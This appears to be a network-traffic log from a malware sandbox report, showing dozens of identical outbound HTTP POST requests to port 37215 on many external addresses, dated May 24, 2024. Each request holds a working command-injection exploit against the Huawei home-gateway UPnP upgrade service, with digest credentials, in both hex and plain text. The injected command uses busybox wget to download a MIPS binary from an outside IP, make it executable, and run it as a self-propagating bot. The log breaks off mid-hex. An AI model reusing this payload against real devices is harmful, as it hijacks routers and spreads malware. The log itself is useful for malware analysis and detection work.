                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  51192.168.2.135571241.26.230.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.060694933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  52192.168.2.1338368197.215.154.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.060739994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  53192.168.2.1360682197.167.102.13437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.060767889 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  54192.168.2.1353786197.9.182.16037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.060776949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  55192.168.2.134884485.181.52.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.060776949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  56192.168.2.1339418197.61.250.14737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.060832977 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  57192.168.2.1354650197.139.220.837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.060846090 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  58192.168.2.1355588191.140.20.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.060857058 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  59192.168.2.133872641.37.225.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.060869932 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  60192.168.2.1339650146.145.226.23837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.060874939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 